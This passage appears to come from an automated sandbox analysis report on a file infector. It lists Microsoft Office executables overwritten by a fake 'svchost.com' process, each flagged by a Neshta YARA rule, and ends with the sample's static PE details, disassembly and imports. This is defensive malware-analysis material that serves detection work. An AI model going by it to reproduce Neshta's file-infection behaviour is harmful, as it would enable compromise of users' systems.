                                                                                                                        Process:C:\Windows\svchost.com
                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):82944
                                                                                                                        Entropy (8bit):5.131108501135707
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:768:eyxqjQl/EMQt4Oei7RwsHxyP7nbxzOQdJaFFlJhl7XC0dHPgzh263DX:JxqjQ+P04wsmJCVFFlJhlLDHmdzX
                                                                                                                        MD5:2DCEF042EE374AC5BA2307EE6D97FFAE
                                                                                                                        SHA1:3E39AD4F60367BAFB47B3759253064F7BA57A92B
                                                                                                                        SHA-256:C83153D11C1D63FF5C330035DD66A958BF19EC465969D82DE87351A2C5F7A99D
                                                                                                                        SHA-512:9319A16EA4B3D49FC1CFC4FE9E5890E2DDAA3E5D1523A150C77E0201C727EA0580E0B2D79CD4914968305B037B987494D57604E4792790069E992EEEE3D5324B
                                                                                                                        Malicious:true
                                                                                                                        Yara Hits:
                                                                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Microsoft Office\Office16\PPTICO.EXE, Author: Florian Roth
                                                                                                                        Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                                                                                        C:\Program Files (x86)\Microsoft Office\Office16\SCANPST.EXE
                                                                                                                        Process:C:\Windows\svchost.com
                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):82944
                                                                                                                        Entropy (8bit):6.254281392784178
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:768:eyxqjQl/EMQt4Oei7RwsHxyP7nbxzOQdJrBE27rCNzU3GLCAAhUSCr1HkueFNUx+:JxqjQ+P04wsmJCKEJzbmAoDucEMQnF0
                                                                                                                        MD5:D7BF211CED7D30A27312CE4DA2487EE1
                                                                                                                        SHA1:CE664FBA8F5BEAA728CB7EAE107C5ED3810A5DDF
                                                                                                                        SHA-256:9266432725D9466253A4F1F609C9A2DD85FC82B3A0E3A6C43FCB1A267C976265
                                                                                                                        SHA-512:260EA864A9512B243DD18EC3C4D6CA7782DD3ED117AA553E6C30F3249655EEDB3768AC190432CBA66078F93C83F8B05CAB352B254FB58C3586EF56F2C3482EED
                                                                                                                        Malicious:true
                                                                                                                        Yara Hits:
                                                                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Microsoft Office\Office16\SCANPST.EXE, Author: Florian Roth
                                                                                                                        Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                                                                                        C:\Program Files (x86)\Microsoft Office\Office16\SELFCERT.EXE
                                                                                                                        Process:C:\Windows\svchost.com
                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):82944
                                                                                                                        Entropy (8bit):6.369176164130001
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:1536:JxqjQ+P04wsmJCmmgFboVWAfMOD9nwcP4McxAF+V2r9Q:sr85CmhFbG5n7vcxAwVIu
                                                                                                                        MD5:E883EB6C4D29614F1887EDF6A2412659
                                                                                                                        SHA1:33DAF7D41A5C6D4D8AB1C91160F775D9810E10F9
                                                                                                                        SHA-256:BE47F38C1D1A3806AD27867DF41BF62AFB77FADCAD4F00CF3B68FD469E1B2154
                                                                                                                        SHA-512:EF18F22EB51AE378651FD7421E56EC682BE64AED01D79FDC1E3366459690AE52E312B4BE3A70C50653EC98C261EE2557C4B4F908AC8254E47B96F7268847F665
                                                                                                                        Malicious:true
                                                                                                                        Yara Hits:
                                                                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Microsoft Office\Office16\SELFCERT.EXE, Author: Florian Roth
                                                                                                                        Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                                                                                        C:\Program Files (x86)\Microsoft Office\Office16\SETLANG.EXE
                                                                                                                        Process:C:\Windows\svchost.com
                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):82944
                                                                                                                        Entropy (8bit):5.694866680260046
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:1536:JxqjQ+P04wsmJC5wI4PqxgWvwG+TUawK:sr85C5wslwG+TUawK
                                                                                                                        MD5:A851E7A4D035C32FCB2830718B34F01C
                                                                                                                        SHA1:6D89FD230ADE8F14971A600591A8B6FAF67CD770
                                                                                                                        SHA-256:73610C44EE38B1785E018C2BC869052729D56C65545F52EE5D2AB89C8C7B6DCE
                                                                                                                        SHA-512:77726930C4BFE2DF33FCADA1A4A493F8DB8B3A5681C5D79DC51F9625C4110680DFA50C44CA272B71E46175FF56954B1583B9771B73412D25D06954AF8AAF81E8
                                                                                                                        Malicious:true
                                                                                                                        Yara Hits:
                                                                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Microsoft Office\Office16\SETLANG.EXE, Author: Florian Roth
                                                                                                                        Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                                                                                        C:\Program Files (x86)\Microsoft Office\Office16\UcMapi.exe
                                                                                                                        Process:C:\Windows\svchost.com
                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):82944
                                                                                                                        Entropy (8bit):6.511827025814232
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:1536:JxqjQ+P04wsmJCHz6xccTu/YnwN9+ko47VGsKkfrwayHd+f:sr85CT6yHYn+o4Jrn
                                                                                                                        MD5:2DBF9767B1524319753ADE899740500C
                                                                                                                        SHA1:D684A9E8CC28A5185CF477554DF2065D73126877
                                                                                                                        SHA-256:14143B435D60E49B251E80E37857E98D36088EB0CBE02C4C630F381E37BA8F0B
                                                                                                                        SHA-512:A7B9EA44485796E0AA8C51A2A762EA95640EE34FEA51C3F043A5EC37E99EE95054F610C8FB72C445609F90B6EBFA5590036294B8E4770BD483E8926B38C7BDB3
                                                                                                                        Malicious:true
                                                                                                                        Yara Hits:
                                                                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Microsoft Office\Office16\UcMapi.exe, Author: Florian Roth
                                                                                                                        Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                                                                                        C:\Program Files (x86)\Microsoft Office\Office16\VPREVIEW.EXE
                                                                                                                        Process:C:\Windows\svchost.com
                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):82944
                                                                                                                        Entropy (8bit):6.361986604416892
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:1536:JxqjQ+P04wsmJC4QTS8CYtvYSi+GAqeqCifxUajaQ:sr85C42S8/caAUSaQ
                                                                                                                        MD5:8F8291D79A298A9B071864C651BB0794
                                                                                                                        SHA1:F7614B1E0D476F1CBC75B5D698711F9DF460F773
                                                                                                                        SHA-256:E9562B1B83495930753D145E9834CCA9128745E3163C060A4AA3D7DA62AA468F
                                                                                                                        SHA-512:160D10672400D32BB10A059CC2AF3CA79810A9D0FDB88B79F6E0BB208DA26F973965853A429A7D9D4CD30570E015F17EB458DF6C6311BB89394AF46ED8B189E7
                                                                                                                        Malicious:true
                                                                                                                        Yara Hits:
                                                                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Microsoft Office\Office16\VPREVIEW.EXE, Author: Florian Roth
                                                                                                                        Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                                                                                        C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                        Process:C:\Windows\svchost.com
                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):82944
                                                                                                                        Entropy (8bit):5.56237653560924
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:768:eyxqjQl/EMQt4Oei7RwsHxyP7nbxzOQdJ/MyzuDxqDq2m1eHwSFdrdAHZY:JxqjQ+P04wsmJCOxzuDxqDsmwSFbuY
                                                                                                                        MD5:2CF8F2ECEB42B70A5493D1EAEAC6B20A
                                                                                                                        SHA1:B411993C6352F4B026153AE4010A6C2D7B1ACE3B
                                                                                                                        SHA-256:A85EB54DE3BE548DBE89BC47098B417F4C1029BA084D0B15F75687D0751EF44E
                                                                                                                        SHA-512:8D2514F16C8D47CE668397B6DEF1A59A4D2C7B7E4A8E7613865C4833BE0B882D87AECB02C049B7496D633CA740DEB33A59DE6D0488F21C26109C89F8C511570D
                                                                                                                        Malicious:true
                                                                                                                        Yara Hits:
                                                                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE, Author: Florian Roth
                                                                                                                        Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                                                                                        C:\Program Files (x86)\Microsoft Office\Office16\WORDICON.EXE
                                                                                                                        Process:C:\Windows\svchost.com
                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):82944
                                                                                                                        Entropy (8bit):5.388189611386593
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:768:eyxqjQl/EMQt4Oei7RwsHxyP7nbxzOQdJ/jWSlFQQoUmydAHZk6:JxqjQ+P04wsmJCOjTlWFauk6
                                                                                                                        MD5:62A21A597FA5F5C489D266A87694FE61
                                                                                                                        SHA1:8A9C326ABA5638F6B91BA8DD18D258998CC9D25B
                                                                                                                        SHA-256:D35B0D2411B6D5CDE4F61E5EBD70BBB1644AAE5E95EF417E3E885B20C194DE49
                                                                                                                        SHA-512:F4F9F7C8BDCDC7CAC1D491E528E88464A78F6254F44F2C3758860B495E188B607EA2FB2B292CCD82829F1E462EC07BFDD5F0F1729F7083C9FA398FD7EC133E26
                                                                                                                        Malicious:true
                                                                                                                        Yara Hits:
                                                                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Microsoft Office\Office16\WORDICON.EXE, Author: Florian Roth
                                                                                                                        Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                                                                                        C:\Program Files (x86)\Microsoft Office\Office16\XLICONS.EXE
                                                                                                                        Process:C:\Windows\svchost.com
                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):82944
                                                                                                                        Entropy (8bit):5.131620925268659
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:768:eyxqjQl/EMQt4Oei7RwsHxyP7nbxzOQdJDK2sNTXC8cEGV6GskwTO:JxqjQ+P04wsmJCOKZxXk6GskwTO
                                                                                                                        MD5:1F414E9B0D1C3584418658367EC9242F
                                                                                                                        SHA1:5D11420BEB0507F3A71925E2A0A2DC36EA1265DF
                                                                                                                        SHA-256:CEB5DB2FF4B04E0C3683D039DB97ACC145C5FB9DD026A7DC9B84F12D424E9488
                                                                                                                        SHA-512:1AE9A3653B774AACEA8A2CD24ED9BAAD8245967E16122F53099A8A640D6BF5C055651C50B5D83C4EBF962060FE021A274EDBFB818093A783884C9AC6DB822D03
                                                                                                                        Malicious:true
                                                                                                                        Yara Hits:
                                                                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Microsoft Office\Office16\XLICONS.EXE, Author: Florian Roth
                                                                                                                        Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                                                                                        C:\Program Files (x86)\Microsoft Office\Office16\lync99.exe
                                                                                                                        Process:C:\Windows\svchost.com
                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):82944
                                                                                                                        Entropy (8bit):6.4980851403396676
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:1536:JxqjQ+P04wsmJCHJDYG7YSUhCD8TanIVayX0TfC8cvB11lV:sr85CpDDkSQCfLy0fk11lV
                                                                                                                        MD5:D4811ACDE0C5F48DACC1BBC3E310E8D8
                                                                                                                        SHA1:06F814E81524B40587E503E32B8865D66A8383A6
                                                                                                                        SHA-256:3B5D056392B165F9001BF785E6F91187B75A67F0209E5C189AE0764A66FF3E10
                                                                                                                        SHA-512:6BE82945EAB1E9FD9BA507045B6B45799AFD11F5A3A30949E03FA100F93750DD0ECEBECABDB1883B764C90791ABED09EE191588BB8A8241AC6A6AFAAA120C169
                                                                                                                        Malicious:true
                                                                                                                        Yara Hits:
                                                                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Microsoft Office\Office16\lync99.exe, Author: Florian Roth
                                                                                                                        Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                                                                                        C:\Program Files (x86)\Microsoft Office\Office16\lynchtmlconv.exe
                                                                                                                        Process:C:\Windows\svchost.com
                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):82944
                                                                                                                        Entropy (8bit):6.57605386644689
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:1536:JxqjQ+P04wsmJCMfSoIt2ZzzV9uc1EshwMDkEcAv4i+:sr85Cnkz//1DgEcAv5+
                                                                                                                        MD5:100E15577B28178663E63AB854D28B4A
                                                                                                                        SHA1:DC7D931ECDA8C09D0D2B43988E6D689A20E080F1
                                                                                                                        SHA-256:238254BCE07446426D478897AC3DE27DE2B9606B2E8477F7DDAF8A20A2999FC4
                                                                                                                        SHA-512:5F5A2C7F553B747A9A1811E9D4D3A0BDA525D5977D5BB709F65164308E020B31A7EC0029C435D8F05E46E737242BB5F934D0094728841F6C545E15C625444C47
                                                                                                                        Malicious:true
                                                                                                                        Yara Hits:
                                                                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Microsoft Office\Office16\lynchtmlconv.exe, Author: Florian Roth
                                                                                                                        Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                                                                                        C:\Program Files (x86)\Microsoft Office\Office16\misc.exe
                                                                                                                        Process:C:\Windows\svchost.com
                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):82944
                                                                                                                        Entropy (8bit):4.744720269791172
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:768:eyxqjQl/EMQt4Oei7RwsHxyP7nbxzOQdJozp/q4:JxqjQ+P04wsmJCV/Z
                                                                                                                        MD5:316C81CA54C5FAC241D16CA25E7B341C
                                                                                                                        SHA1:9E1199BCB359EA9146EAD52E765F3913A791CD7A
                                                                                                                        SHA-256:9CE3D752106B78CBB5CF3DF574CD084177C4CF97FF35CC6E983EAD6F4A3F6CE1
                                                                                                                        SHA-512:CEC15054D8351322566F67B46B333F11064CB650D4ADDCDBC9174C66EE4E4D4F1C3400FDE6BBDCD3B632ED051C92E898C5170B1A6504BB11A771230D4EA15D3F
                                                                                                                        Malicious:true
                                                                                                                        Yara Hits:
                                                                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Microsoft Office\Office16\misc.exe, Author: Florian Roth
                                                                                                                        Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                                                                                        C:\Program Files (x86)\Microsoft Office\Office16\protocolhandler.exe
                                                                                                                        Process:C:\Windows\svchost.com
                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):82944
                                                                                                                        Entropy (8bit):6.422024969420582
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:1536:JxqjQ+P04wsmJCjMnNFZnBeGI9cKm8q3+i2PPvfKLD1D9nwt:sr85CMBeLsOBXiN9nwt
                                                                                                                        MD5:62F99051442ED97159B8D9CC03BBF8DC
                                                                                                                        SHA1:E22CF810217DFC5700C2C629162EF37CA672C957
                                                                                                                        SHA-256:C83C04BB7EBAC75F623938C167AD7F09606F2E0B786A1CCAFA12E080F9455E9A
                                                                                                                        SHA-512:FE259BC5D8C12884C403B4F08E00272DEBFEECEDF5F9230F8B0A3B6DE100D58AEC610B849DFFD94568A44389FACAF7B55B1631F9AA51BD91B7C1F3C91408619A
                                                                                                                        Malicious:true
                                                                                                                        Yara Hits:
                                                                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Microsoft Office\Office16\protocolhandler.exe, Author: Florian Roth
                                                                                                                        Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................

                                                                                                                        Static File Info

                                                                                                                        General

                                                                                                                        File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                        Entropy (8bit):7.789687408663417
                                                                                                                        TrID:
                                                                                                                        • Win32 Executable (generic) a (10002005/4) 97.38%
                                                                                                                        • Win32 Executable Borland Delphi 6 (262906/60) 2.56%
                                                                                                                        • Win16/32 Executable Delphi generic (2074/23) 0.02%
                                                                                                                        • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                        • DOS Executable Generic (2002/1) 0.02%
                                                                                                                        File name:vi0EwpbUht.exe
                                                                                                                        File size:284661
                                                                                                                        MD5:f478c15f5affd8359762b8c6b0e913a4
                                                                                                                        SHA1:05b36949abd35a132488158f38149c7b582c8d3a
                                                                                                                        SHA256:e355ac0da4996011e91f28b11e03c44d54606ae4ceb0bc4f6d0a0edc4b3410ed
                                                                                                                        SHA512:31f7f6d622fc730d5822f40a75e08fc2a48001f8cd696d4d3cb0ebebd45904f4bcc7f8b8dad0866a78baa056316b53d8d2c3b3298c5e0ec441a0fe202e350895
                                                                                                                        SSDEEP:6144:k923CstoxrFKLP+BFY0GfiqlMthQtpAEQq+6:nyYbyuiqS176
                                                                                                                        File Content Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7.......................................................................................................................................

                                                                                                                        File Icon

                                                                                                                        Icon Hash:b2a88c96b2ca6a72

                                                                                                                        Static PE Info

                                                                                                                        General

                                                                                                                        Entrypoint:0x4080e4
                                                                                                                        Entrypoint Section:CODE
                                                                                                                        Digitally signed:false
                                                                                                                        Imagebase:0x400000
                                                                                                                        Subsystem:windows gui
                                                                                                                        Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, BYTES_REVERSED_LO, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, BYTES_REVERSED_HI
                                                                                                                        DLL Characteristics:
                                                                                                                        Time Stamp:0x2A425E19 [Fri Jun 19 22:22:17 1992 UTC]
                                                                                                                        TLS Callbacks:
                                                                                                                        CLR (.Net) Version:
                                                                                                                        OS Version Major:4
                                                                                                                        OS Version Minor:0
                                                                                                                        File Version Major:4
                                                                                                                        File Version Minor:0
                                                                                                                        Subsystem Version Major:4
                                                                                                                        Subsystem Version Minor:0
                                                                                                                        Import Hash:9f4693fc0c511135129493f2161d1e86

                                                                                                                        Entrypoint Preview

                                                                                                                        Instruction
                                                                                                                        push ebp
                                                                                                                        mov ebp, esp
                                                                                                                        add esp, FFFFFFE0h
                                                                                                                        xor eax, eax
                                                                                                                        mov dword ptr [ebp-20h], eax
                                                                                                                        mov dword ptr [ebp-18h], eax
                                                                                                                        mov dword ptr [ebp-1Ch], eax
                                                                                                                        mov dword ptr [ebp-14h], eax
                                                                                                                        mov eax, 00408054h
                                                                                                                        call 00007F8318365847h
                                                                                                                        xor eax, eax
                                                                                                                        push ebp
                                                                                                                        push 00408220h
                                                                                                                        push dword ptr fs:[eax]
                                                                                                                        mov dword ptr fs:[eax], esp
                                                                                                                        mov eax, 004091A8h
                                                                                                                        mov ecx, 0000000Bh
                                                                                                                        mov edx, 0000000Bh
                                                                                                                        call 00007F8318368991h
                                                                                                                        mov eax, 004091B4h
                                                                                                                        mov ecx, 00000009h
                                                                                                                        mov edx, 00000009h
                                                                                                                        call 00007F831836897Dh
                                                                                                                        mov eax, 004091C0h
                                                                                                                        mov ecx, 00000003h
                                                                                                                        mov edx, 00000003h
                                                                                                                        call 00007F8318368969h
                                                                                                                        mov eax, 004091DCh
                                                                                                                        mov ecx, 00000003h
                                                                                                                        mov edx, 00000003h
                                                                                                                        call 00007F8318368955h
                                                                                                                        mov eax, dword ptr [00409210h]
                                                                                                                        mov ecx, 0000000Bh
                                                                                                                        mov edx, 0000000Bh
                                                                                                                        call 00007F8318368941h
                                                                                                                        call 00007F8318368998h
                                                                                                                        lea edx, dword ptr [ebp-14h]
                                                                                                                        xor eax, eax
                                                                                                                        call 00007F8318366282h
                                                                                                                        mov eax, dword ptr [ebp-14h]
                                                                                                                        call 00007F8318366816h
                                                                                                                        cmp eax, 0000A200h
                                                                                                                        jle 00007F8318369A37h
                                                                                                                        call 00007F8318368F16h
                                                                                                                        call 00007F8318369729h
                                                                                                                        mov eax, 004091C4h
                                                                                                                        mov ecx, 00000003h
                                                                                                                        mov edx, 00000003h

                                                                                                                        Data Directories

                                                                                                                        NameVirtual AddressVirtual Size Is in Section
                                                                                                                        IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                        IMAGE_DIRECTORY_ENTRY_IMPORT0x150000x864.idata
                                                                                                                        IMAGE_DIRECTORY_ENTRY_RESOURCE0x190000x1400.rsrc
                                                                                                                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                        IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                        IMAGE_DIRECTORY_ENTRY_BASERELOC0x180000x5cc.reloc
                                                                                                                        IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                        IMAGE_DIRECTORY_ENTRY_TLS0x170000x18.rdata
                                                                                                                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                        IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                                                                                                                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                        Sections

                                                                                                                        NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                        CODE0x10000x722c0x7400False0.617355872845data6.51167217489IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                                                                                        DATA0x90000x2180x400False0.3623046875data3.15169834056IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                                                                                                        BSS0xa0000xa8990x0False0empty0.0IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                                                                                                        .idata0x150000x8640xa00False0.37421875data4.17385976895IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                                                                                                        .tls0x160000x80x0False0empty0.0IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                                                                                                        .rdata0x170000x180x200False0.05078125data0.206920017787IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ
                                                                                                                        .reloc0x180000x5cc0x600False0.848307291667data6.44309346589IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ
                                                                                                                        .rsrc0x190000x14000x1400False0.2041015625data2.6426621724IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ

                                                                                                                        Resources

                                                                                                                        NameRVASizeTypeLanguageCountry
                                                                                                                        RT_ICON0x191500x10a8dataRussianRussia
                                                                                                                        RT_RCDATA0x1a1f80x10data
                                                                                                                        RT_RCDATA0x1a2080xacdata
                                                                                                                        RT_GROUP_ICON0x1a2b40x14dataRussianRussia

                                                                                                                        Imports

                                                                                                                        DLLImport
                                                                                                                        kernel32.dllDeleteCriticalSection, LeaveCriticalSection, EnterCriticalSection, InitializeCriticalSection, VirtualFree, VirtualAlloc, LocalFree, LocalAlloc, GetVersion, GetCurrentThreadId, GetThreadLocale, GetStartupInfoA, GetLocaleInfoA, GetCommandLineA, FreeLibrary, ExitProcess, WriteFile, UnhandledExceptionFilter, RtlUnwind, RaiseException, GetStdHandle
                                                                                                                        user32.dllGetKeyboardType, MessageBoxA
                                                                                                                        advapi32.dllRegQueryValueExA, RegOpenKeyExA, RegCloseKey
                                                                                                                        oleaut32.dllSysFreeString, SysReAllocStringLen
                                                                                                                        kernel32.dllTlsSetValue, TlsGetValue, LocalAlloc, GetModuleHandleA
                                                                                                                        advapi32.dllRegSetValueExA, RegOpenKeyExA, RegCloseKey
                                                                                                                        kernel32.dllWriteFile, WinExec, SetFilePointer, SetFileAttributesA, SetEndOfFile, SetCurrentDirectoryA, ReleaseMutex, ReadFile, GetWindowsDirectoryA, GetTempPathA, GetShortPathNameA, GetModuleFileNameA, GetLogicalDriveStringsA, GetLocalTime, GetLastError, GetFileSize, GetFileAttributesA, GetDriveTypeA, GetCommandLineA, FreeLibrary, FindNextFileA, FindFirstFileA, FindClose, DeleteFileA, CreateMutexA, CreateFileA, CreateDirectoryA, CloseHandle
